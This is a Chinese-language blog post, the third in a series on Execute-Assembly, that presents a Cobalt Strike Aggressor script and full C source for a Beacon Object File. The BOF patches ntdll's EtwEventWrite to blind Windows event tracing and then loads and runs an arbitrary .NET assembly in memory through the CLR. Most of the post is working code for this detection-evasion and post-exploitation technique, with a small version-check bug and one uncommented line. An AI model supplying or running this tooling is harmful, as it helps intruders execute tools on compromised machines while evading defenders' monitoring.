Execute-Assembly（3）

最新推荐文章于 2024-04-17 09:32:39 发布

网安星星

最新推荐文章于 2024-04-17 09:32:39 发布

阅读量385

点赞数 3

文章标签： java 前端服务器网络安全学习

本文链接：https://blog.csdn.net/2301_80520893/article/details/137559106

版权

绕过检测

绕过前面检测的最简单的思路就是Patch ETW。而我想的是使用BOF进行Bypass ETW 以及Assembly加载。值得庆幸得是CobaltStrike官方以及有大佬已经做了这一部分的研究。

脚本学习

在官方的文档Beacon Object Files中，详细描写了怎么使用CNA和BOF。根据文档提供的例子。

alias hello {
 local('$barch $handle $data $args');
 
 # figure out the arch of this session
 $barch  = barch($1);
 
 # read in the right BOF file
 $handle = openf(script_resource("hello. $+ $barch $+ .o"));
 $data   = readb($handle, -1);
 closef($handle);
 
 # pack our arguments
 $args   = bof_pack($1, "zi", "Hello World", 1234);
 
 # announce what we're doing
 btask($1, "Running Hello BOF");
 
 # execute it.
 beacon_inline_execute($1, $data, "demo", $args);
}

使用local定义了本地变量。

使用barch函数获取进程架构，以此后续拼接读取BOF时使用。参数$1表示的是当前会话的ID。Alias的参数有3个。

$0 是我们起的别名和传输的参数
$1 是当前会话的 ID
$2-3-4....第二个参数及以后，就是我们是我们传递的参数，他们由空格隔开，我们举一个例子：

然后通过readb读取BOF文件(.obj)

然后再将参数打包。参数1 $1表示会话ID,第二个参数是传入参数的类型，参数类型如下。从第三个参数就是传入的参数。

最后调用beacon_inline_execute,其实就是执行inline_execute命令。第三个参数是入口点函数。

需要参考Sleep语言的说明http://sleep.dashnine.org/manual/index.html

beacon_command_register(
"InlineExecute_Assembly", 
"test1", 
"test2");

alias InlineExecute_Assembly{
 $data = substr($0, 5);
 @args = split(' ', $data);
 println(@args); 

 local('$AssemblyPath $AssemblyArgs');
 $AssemblyPath = "";
 $AssemblyArgs = "";

 @Optional = @("--AssemblyPath" , "--AssemblyArgs");
 for($i = 0; $i < size(@args) ; $i++){
  if (@args[$i] eq "--AssemblyPath"){
   if(@args[$i + 1] ne ""){
    $AssemblyPath = @args[$i + 1];
    #println($AssemblyPath);
   }
   
  }
  else if (@args[$i] eq "--AssemblyArgs"){
   for($j = $i + 1; $j < size(@args) ; $j++){
    if(@args[$j] in @Optional){
     break;
    }
    if(strlen($AssemblyArgs) == 0){
     $AssemblyArgs = @args[$j]
    }
    else{
     $AssemblyArgs = $AssemblyArgs." ".@args[$j];
    }
   }
   #println($AssemblyArgs);
  }
 }

 # charge AssemblyPath is invaid
 if($AssemblyPath eq "" || !-exists $AssemblyPath || !-isFile $AssemblyPath){
  println($AssemblyPath." is vailed or does not exist\n");
  return;
 }
    
    # read .Net
 $AssemblyHandle = openf($AssemblyPath);
 $AssemblyLength = lof($AssemblyPath);
 $AssemblyBytes = readb($AssemblyHandle , -1);
 closef($AssemblyHandle);
 if(strlen($AssemblyBytes) == 0){
  println($AssemblyPath."load failed \n");
 }
 println("size of .Net is: ".$AssemblyLength);

 # load bof
 $barch  = barch($1);
 $BofPath = script_resource("InlineExecute_Assembly_ $+ $barch $+ .obj");
 
 $BofHandle = openf($BofPath);
 $BofBytes = readb($BofHandle, -1);
 closef($BofHandle);
 if(strlen($BofBytes) == 0){
  println($BofPath." load failed \n");
  return;
 }
 println("bof file path is: ".$BofPath);
 println("size of bof file is:".lof($BofPath));

 println("args is:".$AssemblyArgs);
 $bofArgs = bof_pack($1, "biz",  $AssemblyBytes , $AssemblyLength , $AssemblyArgs);
 #$bofArgs = bof_pack($1, "zi",  $BofPath , $AssemblyLength);
 btask($1, "Running Inline_Execute Assembly BOF");
 beacon_inline_execute($1, $BofBytes, "go", $bofArgs);

 clear(@Optional);

}

BOF编写

BOF主要需要实现两个点，第一实现ByPass ETW，第二需要实现Assembly加载。先看官方给的例子。首先使用BeaconDataParse解析参数，然后调用BeaconDataExtract和BeaconDataInt依次获取string类型和int类型。

其中Bypass ETW原理很简单，只需要Patch EtwEventWrite或者EtwEventWriteFull函数，而Assembly Load就是上面所描述的四个步骤即可。

#include "InlineExecute_Assembly.h"
#include "beacon.h"

#define STATUS_SUCCESS 0

BOOL PatchETW()
{
 LPVOID pEtwEventWrite = KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("ntdll.dll"), "EtwEventWrite");

 if (pEtwEventWrite == NULL)
 {
  BeaconPrintf(CALLBACK_ERROR, "[!] pEtwEventWrite Failed");
  return FALSE;
 }
 BeaconPrintf(CALLBACK_OUTPUT, "[+] pEtwEventWrite Success");

 DWORD oldProtect;

#ifdef _M_AMD64
 SIZE_T length = 1;
 char patch[] = { 0xc3 };
#elif defined(_M_IX86)
 SIZE_T length = 3;
 char patch[] = { 0xc2,0x14,0x00 };
#endif

 NTSTATUS ntStatus = STATUS_SUCCESS;
 HANDLE hProcess = KERNEL32$OpenProcess(PROCESS_ALL_ACCESS, TRUE, KERNEL32$GetCurrentProcessId());
 BeaconPrintf(CALLBACK_OUTPUT, "[+] OpenProcess Success");

 if (KERNEL32$VirtualProtectEx(hProcess, pEtwEventWrite, length, PAGE_EXECUTE_READWRITE, &oldProtect) == FALSE)
 {
  BeaconPrintf(CALLBACK_ERROR, "[!] VirtualProtectEx Failed");
  return FALSE;
 }
 BeaconPrintf(CALLBACK_OUTPUT, "[+] VirtualProtectEx Success");

 SIZE_T NumberOfBytesWritten = 0;
 if (KERNEL32$WriteProcessMemory(hProcess, pEtwEventWrite, patch, length, &NumberOfBytesWritten) == FALSE)
 {
  BeaconPrintf(CALLBACK_ERROR, "[!] WriteProcessMemory Failed");
  return FALSE;
 }
 BeaconPrintf(CALLBACK_OUTPUT, "[+] WriteProcessMemory Success");

 if (KERNEL32$VirtualProtectEx(hProcess, pEtwEventWrite, length, oldProtect, &oldProtect) == FALSE)
 {
  BeaconPrintf(CALLBACK_ERROR, "[!] VirtualProtectEx Failed");
  return FALSE;
 }
 BeaconPrintf(CALLBACK_OUTPUT, "[+] VirtualProtectEx Success");
 return TRUE;

}


BOOL FindVersion(char* AssemblyBytes, int dwLength)
{
 BOOL flag = TRUE;
 char v4[] = { 0x76,0x34,0x2E,0x30,0x2E,0x33,0x30,0x33,0x31,0x39 };
 for (int i = 0; i < dwLength; i++)
 {
  if (MSVCRT$memcmp(AssemblyBytes, v4, 10) == 0)
  {
   flag = TRUE;
   break;
  }
 }
 return flag;
 //int count = 0;
 //for (int i = 0; i < dwLength; i++)
 //{
 // for (int j = 0; j < 10; j++)
 // {
 //  if (AssemblyBytes[i] == v4[j])
 //  {
 //   count++;
 //  }
 // }
 // if (count == 10)
 // {
 //  flag = TRUE;
 //  break;
 // }
 // count = 0;
 // 
 //}
 //return flag;
}

BOOL AssemblyLoad(wchar_t* wNetVersion , char* AssemblyBytes , DWORD AssemblyLength, LPWSTR* ArgumentsArray, int NumArguments)
{
 HRESULT hr;
 ICLRMetaHost* iMetaHost = NULL;
 ICLRRuntimeInfo* iRuntimeInfo = NULL;
 ICorRuntimeHost* iRuntimeHost = NULL;
 IUnknown* pAppDomain = NULL;
 AppDomain* pDefaultAppDomain = NULL;
 Assembly* pAssembly = NULL;
 MethodInfo* pMethodInfo = NULL;

 SAFEARRAYBOUND saBound[1];
 void* pData = NULL;
 VARIANT vRet;
 VARIANT vObj;
 VARIANT vPsa;
 SAFEARRAY* args = NULL;

 hr = MSCOREE$CLRCreateInstance(&xCLSID_CLRMetaHost, &xIID_ICLRMetaHost, (VOID**)&iMetaHost);
 if (hr != ERROR_SUCCESS)
 {
  BeaconPrintf(CALLBACK_ERROR, "[!] CLRCreateInstance Failed:%d",hr);
  return FALSE;
 }
 BeaconPrintf(CALLBACK_OUTPUT, "[+] CLRCreateInstance Success");


 hr = iMetaHost->lpVtbl->GetRuntime(iMetaHost, wNetVersion, &xIID_ICLRRuntimeInfo, (VOID**)&iRuntimeInfo);
 if (hr != ERROR_SUCCESS)
 {
  BeaconPrintf(CALLBACK_ERROR, "[!] GetRuntime Failed:%d", hr);
  return FALSE;
 }
 BeaconPrintf(CALLBACK_OUTPUT, "[+] GetRuntime Success");

 hr = iRuntimeInfo->lpVtbl->GetInterface(iRuntimeInfo,&xCLSID_CorRuntimeHost, &xIID_ICorRuntimeHost, (VOID**)&iRuntimeHost);
 if (hr != ERROR_SUCCESS)
 {
  BeaconPrintf(CALLBACK_ERROR, "[!]GetInterface Failed:%d", hr);
  return FALSE;
 }
 BeaconPrintf(CALLBACK_OUTPUT, "[+] GetInterface Success");

 hr = iRuntimeHost->lpVtbl->Start(iRuntimeHost);
 if (hr != ERROR_SUCCESS)
 {
  BeaconPrintf(CALLBACK_ERROR, "[!]CLR Start Failed:%d", hr);
  return FALSE;
 }
 BeaconPrintf(CALLBACK_OUTPUT, "[+] CLR Start Success");


 //hr = iRuntimeHost->lpVtbl->GetDefaultDomain(iRuntimeHost,&pAppDomain);
 hr = iRuntimeHost->lpVtbl->CreateDomain(iRuntimeHost, (LPCWSTR)L" ", NULL, &pAppDomain);
 if (hr != ERROR_SUCCESS)
 {
  BeaconPrintf(CALLBACK_ERROR, "[!]GetDefaultDomain Failed:%d", hr);
  return FALSE;
 }
 BeaconPrintf(CALLBACK_OUTPUT, "[+] GetDefaultDomain Success");


 hr = pAppDomain->lpVtbl->QueryInterface(pAppDomain, &xIID_AppDomain, (VOID**)&pDefaultAppDomain);
 if (hr != ERROR_SUCCESS)
 {
  BeaconPrintf(CALLBACK_ERROR, "[!]QueryInterface Failed:%p", hr);
  return FALSE;
 }
 BeaconPrintf(CALLBACK_OUTPUT, "[+] QueryInterface Success");

 saBound[0].cElements = AssemblyLength;
 saBound[0].lLbound = 0;
 SAFEARRAY* pSafeArray = OLEAUT32$SafeArrayCreate(VT_UI1, 1, saBound);
 if (pSafeArray == NULL)
 {
  BeaconPrintf(CALLBACK_ERROR, "[!]SafeArrayCreate Failed:%d", hr);
  return FALSE;
 }
 BeaconPrintf(CALLBACK_OUTPUT, "[+]SafeArrayCreate Success");

 hr = OLEAUT32$SafeArrayAccessData(pSafeArray, &pData);
 if (hr != ERROR_SUCCESS)
 {
  BeaconPrintf(CALLBACK_ERROR, "[!]SafeArrayAccessData Failed:%d", hr);
  return FALSE;
 }
 BeaconPrintf(CALLBACK_OUTPUT, "[+] SafeArrayAccessData Success");

 MSVCRT$memcpy(pData, AssemblyBytes, AssemblyLength);

 hr = OLEAUT32$SafeArrayUnaccessData(pSafeArray);
 if (hr != ERROR_SUCCESS)
 {
  BeaconPrintf(CALLBACK_ERROR, "[!]SafeArrayUnaccessData Failed:%d", hr);
  return FALSE;
 }
 BeaconPrintf(CALLBACK_OUTPUT, "[+] SafeArrayUnaccessData Success");

 hr = pDefaultAppDomain->lpVtbl->Load_3(pDefaultAppDomain,pSafeArray, &pAssembly);
 if (hr != ERROR_SUCCESS)
 {
  BeaconPrintf(CALLBACK_ERROR, "[!]Load_3 Failed:%d", hr);
  return FALSE;
 }
 BeaconPrintf(CALLBACK_OUTPUT, "[+] Load_3 Success");

 hr = pAssembly->lpVtbl->EntryPoint(pAssembly,&pMethodInfo);
 if (hr != ERROR_SUCCESS)
 {
  BeaconPrintf(CALLBACK_ERROR, "[!]EntryPoint Failed:%d", hr);
  return FALSE;
 }
 BeaconPrintf(CALLBACK_OUTPUT, "[+] EntryPoint Success");

 MSVCRT$memset(&vRet, 0, sizeof(VARIANT));
 MSVCRT$memset(&vObj, 0, sizeof(VARIANT));
 vObj.vt = VT_NULL;
 vPsa.vt = (VT_ARRAY | VT_BSTR);
 args = OLEAUT32$SafeArrayCreateVector(VT_VARIANT, 0, 1);
 if (NumArguments > 1)
 {
  vPsa.parray = OLEAUT32$SafeArrayCreateVector(VT_BSTR, 0, NumArguments);
  for (long i = 0; i < NumArguments; i++)
  {
   OLEAUT32$SafeArrayPutElement(vPsa.parray, &i, OLEAUT32$SysAllocString(ArgumentsArray[i]));
  }
  long idx[1] = { 0 };
  OLEAUT32$SafeArrayPutElement(args, idx, &vPsa);
 }

 hr = pMethodInfo->lpVtbl->Invoke_3(pMethodInfo,vObj, args, &vRet);
 if (hr != ERROR_SUCCESS)
 {
  BeaconPrintf(CALLBACK_ERROR, "[!]Invoke Failed:%d", hr);
  return FALSE;
 }
 BeaconPrintf(CALLBACK_OUTPUT, "[+] Invoke Success");

 pMethodInfo->lpVtbl->Release(pMethodInfo);
 pAssembly->lpVtbl->Release(pAssembly);
 pDefaultAppDomain->lpVtbl->Release(pDefaultAppDomain);
 iRuntimeInfo->lpVtbl->Release(iRuntimeInfo);
 iMetaHost->lpVtbl->Release(iMetaHost);
 OLE32$CoUninitialize();
 return TRUE;

}

void go(char* args, int length)
{
 BeaconPrintf(CALLBACK_OUTPUT, "[+] go go go");

 if(PatchETW() == TRUE)
 {
  BeaconPrintf(CALLBACK_OUTPUT,"patch etw Success");
 }

 datap  parser;
 BeaconDataParse(&parser, args, length);
 char* AssemblyBytes = BeaconDataExtract(&parser, NULL);
 DWORD AssemblyLength = BeaconDataInt(&parser);
 char* AssemblyArguments = BeaconDataExtract(&parser, NULL);
 BeaconPrintf(CALLBACK_OUTPUT, "[+] AssemblyArguments: %s and AssemblyLength :%d ", AssemblyArguments, AssemblyLength);

 wchar_t* wNetVersion = NULL;
 if (FindVersion(AssemblyBytes, AssemblyLength) == TRUE)
 {
  wNetVersion = L"v4.0.30319";
  //toWideChar("v4.0.30319", wNetVersion, 22);
 }
 else
 {
  wNetVersion = L"v2.0.50727";
  //toWideChar("v2.0.50727", wNetVersion, 22);
 }
 BeaconPrintf(CALLBACK_OUTPUT, "[+] wNetVersion is %ls", wNetVersion);

 将Assembly参数转化为WCHAR类型
 size_t convertedChars = 0;
 wchar_t* wAssemblyArguments = NULL;
 DWORD wideSize = MSVCRT$strlen(AssemblyArguments) + 1;
 wAssemblyArguments = (wchar_t*)MSVCRT$malloc(wideSize * sizeof(wchar_t));
 MSVCRT$mbstowcs_s(&convertedChars, wAssemblyArguments, wideSize, AssemblyArguments, _TRUNCATE);
 BeaconPrintf(CALLBACK_OUTPUT, "[+] wAssemblyArguments is %ls", wAssemblyArguments);

 int NumArgs = 0;
 LPWSTR* ArgumentsArray = NULL;
 ArgumentsArray = SHELL32$CommandLineToArgvW(wAssemblyArguments, &NumArgs);
 BeaconPrintf(CALLBACK_OUTPUT, "[+] ArgumentsArray is %ls", wAssemblyArguments);

 AssemblyLoad(wNetVersion, AssemblyBytes, AssemblyLength, ArgumentsArray, NumArgs);

}

网安星星

关注

3
点赞
踩
10

收藏

觉得还不错? 一键收藏
0
评论
Execute-Assembly（3）

绕过前面检测的最简单的思路就是Patch ETW。而我想的是使用BOF进行Bypass ETW 以及Assembly加载。BOF主要需要实现两个点，第一实现ByPass ETW，第二需要实现Assembly加载。在官方的文档Beacon Object Files中，详细描写了怎么使用CNA和BOF。参数$1表示的是当前会话的ID。Alias的参数有3个。表示会话ID,第二个参数是传入参数的类型，参数类型如下。从第三个参数就是传入的参数。第三个参数是入口点函数。$0 是我们起的别名和传输的参数。
复制链接

扫一扫